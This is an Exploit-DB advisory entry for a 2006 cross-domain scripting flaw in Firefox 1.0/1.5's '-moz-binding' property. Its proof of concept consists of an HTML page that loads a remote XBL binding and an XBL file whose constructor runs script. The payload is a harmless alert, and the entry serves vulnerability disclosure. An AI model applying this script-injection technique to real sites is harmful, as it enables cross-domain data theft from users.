Mozilla Firefox 1.0/1.5 XBL - MOZ-BINDING Property Cross-Domain Scripting

EDB-ID: 27150
Platform: Linux
Date: 2006-01-30

source: https://www.securityfocus.com/bid/16427/info

Mozilla Firefox is prone to a security vulnerability that may let a Web page execute malicious script code in the context of an arbitrary domain.

The issue affects the '-moz-binding' property.


This could allow a malicious site to access the properties of a trusted site and facilitate various attacks, including disclosure of sensitive information.

http://domain1/path/to/page.html :

<html>
<head>
<style>
body { -moz-binding: url("http://domain2/path/to/xbl.xml#xss"); }
</style>
</head>
<body>
</body>
</html>

http://domain2/path/to/xbl.xml :

<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl"
xmlns:html="http://www.w3.org/1999/xhtml">

<binding id="xss">
<implementation>
<constructor>
alert("XBL XSS");
</constructor>
</implementation>
</binding>

</bindings>